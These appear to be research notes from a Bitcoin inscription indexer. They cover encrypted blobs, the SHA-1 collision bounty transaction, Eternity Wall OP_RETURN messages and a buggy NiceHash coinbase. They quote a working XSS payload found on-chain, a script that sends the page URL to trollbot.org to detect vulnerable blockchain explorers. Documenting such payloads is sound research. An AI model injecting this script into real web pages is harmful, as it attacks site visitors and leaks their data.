Transactions such as tx fe37c7eee73be5fda91068dbe0eb74a68495a3fc7185712b8417032db7fc9c5e (2015-01-15) starting with
U2FsdGVkX1/4iSjLxQ5epo8eRSCOQLGgAsn1CucGii27k8ZyC7Jz6wxhYcevVmxi
6Q4ZFN04WDN0UhKqYardgQf26oeBMURupduDd0ZozxlgMrBkFOCaARqU7RABVWDO
/ruPUcOY0VC8p4lrMNqSdqvN7y6OWwOSH3c0duumZfFNZs9+BbtKCxtaqR5+RkUI
are Base64 encoded. Running them through base64 -d leads to starting output bytes Salted__ which as mentioned at security.stackexchange.com/questions/124312/decrypting-binary-code-from-a-base64-string is OpenSSL encrypted data. So hwerever we see the start:
U2FsdGVkX1/
we might as well give up. That string appears 26 times in our data currently, between 6c091e6152b83ec0df8d0d87c7c5f3da72a3328ed3a5d91768ba0ab899c16b9d (2014-09-28) and 84189c82995db355e92e37f8cfe8a9274e9a5d157f1f1658067672e707469a09 (2019-07-06)
The following via cryptograffiti.info get marked by file as "openssl enc'd data with salted password, Base64 encoded":
  • ad3d8a0a5d57114b1780341cb5104284f029bb01b1b3558f7c7b9ce51eb67e18
  • 1cd0c631f444d664601468f644b70e0166019a54d8678de51310139b6c8b2bd7
  • ccc3fb2c9cb1c640b76645a8658693066fd63433ab17c318691ad5bd62601c0e
  • e6eb0cb8268a9b3d012d2957b32d4b28ccc3317593f54f4bfe4b387326588bd2
  • c40e322b198b715accc4a67fad244ed131b8cef0785070e06d10d56c4ab389f2
  • 37a261ac6dbf59e3c9673a22028bcdbdd08926a9d32134ab8fba0897f6dcd196
  • f1aa516fe00ec2156f16fcb9da422f6cbcd141e8e58c895d8bc37b4ad2fd714e
  • 7faf29c7dd7d9cc6d099c262f7ec7edd7fc768276482ad66ceefdd814f1d38ab
  • 69cac244051661cc0b8b08905af5ab312a1282b68c932e5d1e3c46ad47ff0f7a
  • 1773c39f844951b7169dc34aa0c72aa7b43cae6a103ed1223527ef0f4deec2a9
  • b1d4bf3fc46e63c995ad4299f3576340077bc810dfa5c502d1c068460d54bc98
  • a52625837741902e1dd24de3dbd3b948d6e0907ad3fc957c13cdf53fa2c3b9ac
  • 4ca742813eaccef009e24e92150dda06540c2ac81782f1569b1ebb3179a413d2
  • 6c3bab5fc6e6352c62a16ab0f47394845aa41a2c0b25e1a1073a4aeac150e03d
  • 20b8feef3d293a0dd79e3c169fceb1217465502a523acbab903a7eb0cd183709
  • b7863215b99567bc9e71155b13f3c5f26d15eac52493ee2e834129460ffd2aec
  • 2c8961a64bb11d5855790085f51007273467f7ef862137215c9f1d958dcb6c57
  • bed542957bdd8f644a4fcd671a8c66a5cc5d6168f9fa60d37177703e77558eee
  • 3e45af9d828754d5a38c86636a070610f6e828482718c4a597d272d41a3e31fa
  • a13af4817e85cacce3cfb445001e2fb2f56cdc30f78348fd2580bf8f4c84dc55
  • 87a10f6bc65a08067b2544e46be00d4af62c0cfed3ae0b165d5eedaff09d81da
  • ef55826befabbe9dcd44d87fc385d600dd4c4cba3346cde53d8c591960e9b4dc
  • 5d30f63131dcf2b4d001b4ab530e18cc6ff8ffd16cade055ff4587a59b84e420
  • 8a75514829b6e30b9fea434eef77b1589ff3f4bdfc0056bd087efbfb8314eb59
  • e2be1062c9d43cc6ed43de6f7a40c728d2d92ed0325abde24ff3300cf3ae136a
  • 8fe5c2679237e36c74fda04bb083f732c4afdd06af81121b1d7b4d5bd677135f
  • 7f099f094d8d51105d8655253d45ebddf1c88b9e138c302a65d2878a237e620c
  • 0fc4b3a305e2a7faa2e7d9c2f23d23d626e9e75f1f2a37133f283334b314645b
  • 933b321e7b7144ed5e4e1750f944be9ed10293633d9b288bf05febdeb9dc40a3
  • 6215486bc024dea7991b142e50e111c4063e1db4a867514612b8e794b8ef5635
  • fc0613e11269962d97373b10e310f451fb76c7bb477ba1afb45773c44851e9ed
  • ab51d2c037b4625394c68706da83c26bad751018d2a3e377a51988bd8ee18647
  • 7ca9b337172f4feff67a0ecbfbd76798265e08c6ebe989a319883c695d756247
  • 0f0b477e456dcf286d7262497bcd5b3b6a3ce89f81761c2f59ff702539ab6183
  • a320152fd59426c8853dd781db9d682f89755953b39a653f9e9c9628a5fce7fb
  • e96221da774fb52d24dda1b83b14c99085eb4befac64691722c56eb750562d68
  • a7a5ca68dd340dd42bd5c91e0febe68e5fd2fb993da2992661183eaafe8ad89e
  • 64e9d95e2333cfd155506199c8d926649e63a98dbc83c1221b8dd1580937b942
blockchain.news/news/mysterious-bitcoin-inscriptions-a-puzzle-in-raw-binary-data mentions a huge 9 MB Ordinal ruleset inscription that no-one managed to decode, and so people suspect is encrypted data. Seems to be split across transactions, starting at fed7de7fb75a3fe3c1acbbd8e19a4c540fb368474c8834e4ddb1d5bab764a767
As mentioned at the prize was claimed at 8d31992805518fd62daa3bdd2a5c4fd2cd3054c9b3dca1d78055e9528cff6adc (2017-02-23) which spends several inputs with the same unlock script that presents two different constantants that have the same SHA-1:
printf 255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017f46dc93a6b67e013b029aaa1db2560b45ca67d688c7f84b8c4c791fe02b3df614f86db1690901c56b45c1530afedfb76038e972722fe7ad728f0e4904e046c230570fe9d41398abe12ef5bc942be33542a4802d98b5d70f2a332ec37fac3514e74ddc0f2cc1a874cd0c78305a21566461309789606bd0bf3f98cda8044629a1 | xxd -r -p | sha1sum
printf 255044462d312e330a25e2e3cfd30a0a0a312030206f626a0a3c3c2f57696474682032203020522f4865696768742033203020522f547970652034203020522f537562747970652035203020522f46696c7465722036203020522f436f6c6f7253706163652037203020522f4c656e6774682038203020522f42697473506572436f6d706f6e656e7420383e3e0a73747265616d0affd8fffe00245348412d3120697320646561642121212121852fec092339759c39b1a1c63c4c97e1fffe017346dc9166b67e118f029ab621b2560ff9ca67cca8c7f85ba84c79030c2b3de218f86db3a90901d5df45c14f26fedfb3dc38e96ac22fe7bd728f0e45bce046d23c570feb141398bb552ef5a0a82be331fea48037b8b5d71f0e332edf93ac3500eb4ddc0decc1a864790c782c76215660dd309791d06bd0af3f98cda4bc4629b1 | xxd -r -p | sha1sum
both giving
f92d74e3874587aaf443d1db961d4e26dde13e9c
It was claimed on the same day that Google disclosed the collision: security.googleblog.com/2017/02/announcing-first-sha1-collision.html
Both of these are PDF prefixes, so they start with the PDF file signature, but are not fully viewable PDFs on their own.
All found so far are also reproduced at: asciiart.website/index.php?art=people/naked%20ladies therefore not blockchain original.
Some of the very first ASCII art present in the blockchain besides BitLen is porn. Surprising?
Coinbase message are messages that only miners can embed in the blockchain.
As such most of them tend to be boring ads for mining pools, but there are a few exceptions, especially in the early days.
This website used to allow embedding text messages with OP_RETURN, here's an archive from 2015: web.archive.org/web/20150718052659/http://eternitywall.it/
As of January 2024, it seems to read-only mode, where it simply indexes matching transactions that were made via other means: web.archive.org/web/20230929075331/https://eternitywall.it/
There were 3191 hits for the search term:
git grep '\bEW '
in our data starting with tx a3b3af21514bd79a4cbcac9916a8514636a72d813539192214542fd85247082e (2015-06-24):
EW Eternity wall is live
up to the last entry on tx 28820bc14cf2cfda58ecbc9ac6df3f41a1cb90f4246543f01ba42a5e9dac3cf8 (2023-06-15)
EW May our friendship endure, signed by hg, kty, wjj, and xyz.
no doubt initials of 4 Chinesepeople. A blood brother oath comes to mind, akin to the Oath of the Peach Garden. Will these four be the ones to take down the evil dictator Xi Jinping?
The very first message gives away the name of what we assume is a web-based upload system, "EW" being its advertisement signature added to every message.
Running bitcoin-cli:
bitcoin-core.cli getrawtransaction a3b3af21514bd79a4cbcac9916a8514636a72d813539192214542fd85247082e true
shows that the messages are encoded with OP_RETURN:
  "vout": [
    {
      "value": 0.00000000,
      "n": 0,
      "scriptPubKey": {
        "asm": "OP_RETURN 455720457465726e6974792077616c6c206973206c697665
Starting tx 2f201c8518c7b012c03c2c82e40e86f6aaf616ea5fbe22570aac9d2c6611cb68 (2023-03-11), the chain is flooded with ASCII transactions containing many repeated double quotes " and digits 3, with some other characters interspersed in them without any clear pattern e.g. the first one:
""""""""""""""""""""""""""""""""jk""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""'}""""""""""""""""""""""""""""""""/D""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""q1""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""XK""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
TODO what is up with that?
In that first trasaction the quotes appear as part of a multisig output script.
From their site:
OCM Genesis is our flagship generative art collection that's set many historic precedents since its launch in 2021. Genesis is the first NFT collection where all 10,000 images and metadata (similar to DNA describing the NFT) were generated using code entirely on-chain in a single transaction on Ethereum. With the launch of Bitcoin Ordinals, Genesis is the first ever collection of 10,000 images to be inscribed on Bitcoin in 2023.
Some of their likely transactions were noted in our list of large transactions: github.com/cirosantilli/bitcoin-inscription-indexer/blob/master/data/payload_size_out e.g.:
004c3f1efa0095b229dd05ea247c94a5af742daf682fb082a6e62f4aeeb973f2 66033
ffc73ef454d512f98a451960e05a0a036406ed1078a1bd7082fd4036cf0af067 66021
but we haven't had the patience to index them properly yet. Boring art anyways.
Output 0 does:
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP
where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`
This is almost spendable with:
1 OP_TOALTSTACK 10 1 2
but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
In this malformed Coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the entire block reward of 6.25 BTC then worth about $ 123,000.
The output is unspendable because it ends in a constant 0, the disassembly of the first and main output is this series of constants:
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
and for the second smaller one:
aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
the third one being an OP_RETURN message.
Sister transaction of 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af with another variant of the XSS but without IF and OP_FROMALTSTACK, thus making it spendable:
OP_ADD OP_ADD 13 OP_EQUAL <large xss constant> OP_DROP

There are unlisted articles, also show them or only show them.